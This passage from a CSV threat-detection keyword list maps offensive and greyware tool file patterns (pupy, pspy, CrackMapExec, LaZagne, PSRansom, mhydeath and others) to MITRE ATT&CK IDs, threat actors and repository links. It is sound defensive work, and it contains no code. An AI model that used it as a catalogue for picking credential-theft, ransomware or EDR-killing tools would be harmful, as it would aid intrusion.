Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/Privileger.git*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" +"*/PrivKit.git*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*/PrivKit/*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*/proberbyte.go*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*/procdump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/process_herpaderping/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/process_killer.cpp*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*/processhacker-*-bin.zip*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*/processhacker/files/latest/download*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*/Process-Instrumentation-Syscall-Hook*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/ProduKey.exe*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/prometheus.exe","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","176","63","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" +"*/protocols/ftp.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/ldap.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/mssql.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/rdp.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/rdp.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/smb.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/protocols/ssh.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/proxy/Tor.py*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" +"*/proxy/tor_paths.py*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" +"*/Proxy_Def_File_Generator.cna*","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" +"*/proxychains.git*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*/proxymaybeshell*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/ps_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/ps1_oneliner.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PS2EXE.git*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*/ps2exe.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/PS2EXE/*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*/ps-empire*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/psexec.json*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/psnuffle*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/PSpersist.git*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" +"*/pspy -*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/PSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/pspy.git*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/pspy.go*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/pspy/cmd*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/pspy32*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/pspy64*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/PSRansom -*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z" +"*/psscanner.go*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/PSSW100AVB*","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","984","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" +"*/pswRecovery4Moz.txt*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*/ptunnel-ng*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*/puckiestyle/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","1","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" +"*/puppet-naivesigning.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/pupwinutils/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupy/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupy/commands/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupy/memimporter/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupy/output/pupyx64*.exe*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - 